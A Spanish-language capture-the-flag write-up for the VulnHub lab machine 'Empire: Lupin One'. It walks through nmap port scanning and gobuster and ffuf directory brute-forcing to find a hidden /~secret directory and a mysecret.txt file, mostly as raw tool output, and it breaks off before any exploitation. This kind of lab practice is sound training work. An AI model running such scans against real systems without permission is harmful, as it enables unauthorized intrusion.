Write Up Empire Lupin One VulnHub

Escaneo de puertos

nmap -p- --min-rate 5000 -sV <IP>


Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 06:19 EDT
Nmap scan report for
Host is up (0.00045s latency).

22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
|   256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_  256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.48 (Debian)
| http-robots.txt: 1 disallowed entry 
MAC Address: 00:0C:29:2E:8E:12 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.45 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds


gobuster dir -u http://<IP>/ -w <WORDLIST> -x php,html,txt -t 50 -r -k


Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
Starting gobuster in directory enumeration mode
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.txt        (Status: 403) [Size: 280]
/.htaccess.html       (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd.txt        (Status: 403) [Size: 280]
/.htpasswd.html       (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/image                (Status: 200) [Size: 954]
/index.html           (Status: 200) [Size: 333]
/javascript           (Status: 403) [Size: 280]
/manual               (Status: 200) [Size: 676]
/robots.txt           (Status: 200) [Size: 34]
/robots.txt           (Status: 200) [Size: 34]
/server-status        (Status: 403) [Size: 280]
Progress: 81876 / 81880 (100.00%)

Encontramos un /robots.txt si enctramos dentro de el, vemos lo siguiente...

User-agent: *
Disallow: /~myfiles

Por lo que en la URL pondremos eso que encontramos...

URL = http://<IP>/~myfiles/

Y nos encontraremos como una especie de pagina con un Error 404 pero si la inspeccionamos, vemos lo siguiente...

<!-- Your can do it, keep trying. -->

Encontramos algo parecido si inspeccionamos la pagina principal...

<!-- Its an easy box, dont give up. -->

ffuf (FUZZ)

ffuf -w <WORDLIST> -u http://<IP>/~FUZZ

Intercambiaremos myfiles por FUZZ para que busque de un diccionario por fuerza bruta que subcarpetas puede haber pero con el simbolo ~ que nos hemos encontrado...

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       


 :: Method           : GET
 :: URL              :
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500

myfiles                 [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 66ms]
secret                  [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 37ms]
:: Progress: [20469/20469] :: Job [1/1] :: 2150 req/sec :: Duration: [0:00:11] :: Errors: 0 ::

Por lo que pondremos en la URL lo siguiente...

URL = http://<IP>/~secret

Nos encontramos lo siguiente...

Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,
Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.
I'm smart I know that.
Any problem let me know

Your best friend icex64 
ffuf -w /usr/share/wordlists/directory-list-2.3-medium.txt -u http://<IP>/~secret/.FUZZ -e .html,.php,.txt -t 200


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       


 :: Method           : GET
 :: URL              :
 :: Wordlist         : FUZZ: /usr/share/wordlists/directory-list-2.3-medium.txt
 :: Extensions       : .html .php .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500

# Copyright 2007 James Fisher.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
# directory-list-2.3-medium.txt.php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.php                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
# Copyright 2007 James Fisher.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
# This work is licensed under the Creative Commons .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
# This work is licensed under the Creative Commons .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
# This work is licensed under the Creative Commons .php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
# or send a letter to Creative Commons, 171 Second Street, .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 16ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
# Copyright 2007 James Fisher [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 16ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 16ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 16ms]
# Copyright 2007 James Fisher.php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 16ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 16ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 16ms]
# directory-list-2.3-medium.txt.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
# or send a letter to Creative Commons, 171 Second Street, .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]
#.php                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]
# on atleast 2 different hosts [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]
# directory-list-2.3-medium.txt.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
# Priority ordered case sensative list, where entries were found .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
# Priority ordered case sensative list, where entries were found  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 34ms]
# Priority ordered case sensative list, where entries were found .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 53ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 53ms]
# Suite 300, San Francisco, California, 94105, USA..html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]
                        [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 44ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
# on atleast 2 different hosts.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
# or send a letter to Creative Commons, 171 Second Street, .php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 55ms]
# on atleast 2 different hosts.php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
# Priority ordered case sensative list, where entries were found .php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
# Suite 300, San Francisco, California, 94105, USA..txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
# on atleast 2 different hosts.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 54ms]
#.php                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 55ms]
#.php                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 10ms]
# Suite 300, San Francisco, California, 94105, USA..php [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 58ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 55ms]
html.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
html                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
html.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]
html.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
http                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
http.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
http.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
http.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
htdocs.php              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htdocs.html             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htdocs                  [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
htdocs.txt              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
htm                     [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
htm.php                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
htm.html                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
htm.txt                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
ht.html                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
ht                      [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
ht.txt                  [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
ht.php                  [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
httpd.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
httpd                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
httpd.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 21ms]
httpd.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 27ms]
htmlcrypto.txt          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
htmlcrypto              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
htmlcrypto.html         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
htmlcrypto.php          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
httptype.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
httptype.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
httptype.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
httptype                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
htmls.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 38ms]
htmls.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 38ms]
htmls.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 38ms]
htmls                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 34ms]
htc.txt                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms]
htc.php                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms]
htc.html                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms]
htc                     [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms]
htbin.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 7ms]
htbin                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 7ms]
htbin.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
htbin.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
htaccess.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
htaccess                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
htaccess.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
htaccess.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
ht_flag                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
ht_flag.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
ht_flag.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
ht_flag.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
htdig.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 21ms]
htdig.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
htdig                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 21ms]
htdig.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
html401.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html401.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html401                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html401.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
htmlhelp                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
htmlhelp.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
htmlhelp.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
htmlhelp.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]
https.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
https                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
https.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
https.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
httpd-2.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 42ms]
httpd-2.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 42ms]
httpd-2                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 42ms]
httpd-2.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 43ms]
httptunnel.html         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
httptunnel.txt          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
httptunnel.php          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
httptunnel              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]
html_wrap.txt           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
html_wrap.php           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
html_wrap.html          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 6ms]
html_wrap               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 6ms]
http_request.txt        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
http_request            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 8ms]
http_request.html       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
http_request.php        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 7ms]
html4                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
html4.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html4.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html4.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
html_files.html         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
html_files.php          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
html_files              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
html_files.txt          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
http%3A                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
http%3A.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
http%3A.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]
http%3A.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 30ms]
htww.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
htww.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
htww.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
htww                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 23ms]
httpes.html             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
httpes.php              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
httpes.txt              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
httpes                  [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
htmldocs.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 6ms]
htmldocs                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 9ms]
htmldocs.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 9ms]
htmldocs.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
html_cheatsheet.txt     [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 9ms]
html_cheatsheet.html    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 9ms]
html_cheatsheet.php     [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 9ms]
html_cheatsheet         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
html2.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
html2                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 21ms]
html2.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
html2.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
htmlarea.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 12ms]
htmlarea.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htmlarea.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htmlarea                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
                        [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 17ms]
htsrv.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 12ms]
htsrv.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 12ms]
htsrv.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htsrv                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
htsearch.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 8ms]
htsearch.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 9ms]
htsearch.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
htsearch                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 10ms]
htb                     [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2ms]
htb.html                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2ms]
htb.php                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2ms]
htb.txt                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 3ms]
html-editors.php        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]
html-editors.txt        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
html-editors            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
html-editors.html       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 29ms]
htmlstory.txt           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
htmlstory.html          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 8ms]
htmlstory               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
htmlstory.php           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 18ms]
html_single.txt         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html_single.html        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html_single             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html_single.php         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
htforum.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 23ms]
htforum                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]
htforum.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
htforum.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
htmledit.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
htmledit.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
htmledit.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
htmledit                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
http_response.txt       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
http_response           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
http_cycle              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
http_response.php       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
http_cycle.txt          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
http_cycle.html         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
http_cycle.php          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
http_response.html      [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
html-calendar           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
html-calendar.txt       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
html-calendar.php       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
html-calendar.html      [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 17ms]
htp                     [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 4ms]
htp.txt                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
htp.php                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
htp.html                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
html40.txt              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 12ms]
html40                  [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
html40.php              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
html40.html             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
httport.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 8ms]
httport                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 8ms]
httport.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
httport.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
htpc.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 44ms]
htpc                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 44ms]
htpc.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 57ms]
htpc.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 58ms]
htf1.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
htf1.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 26ms]
htf1.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 27ms]
htf1                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
ht_s.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
ht_s.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
ht_s.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
ht_s                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
htab.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htab                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
htab.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
htab.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 12ms]
htmlpages.txt           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
htmlpages.html          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 21ms]
htmlpages               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
htmlpages.php           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 21ms]
mysecret.txt            [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 22ms]
httpads.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
httpads.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
httpads.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
httpads                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
html_parser.txt         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 21ms]
html_parser             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 22ms]
html_parser.php         [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
html_parser.html        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 20ms]
html98.html             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 27ms]
html98.txt              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
html98.php              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
html98                  [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
httptunnel-3            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
httptunnel-3.txt        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
httptunnel-3.php        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
httptunnel-3.html       [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
ht02.php                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 5ms]
ht02.txt                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 7ms]
ht02.html               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 7ms]
ht02                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 7ms]
htmap.txt               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 12ms]
htmap.php               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 12ms]
htmap                   [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 27ms]
htmap.html              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 16ms]
htm_hl.html             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htm_hl                  [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 13ms]
htm_hl.php              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
htm_hl.txt              [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 19ms]
html-companyprofile.php [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
html-companyprofile     [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
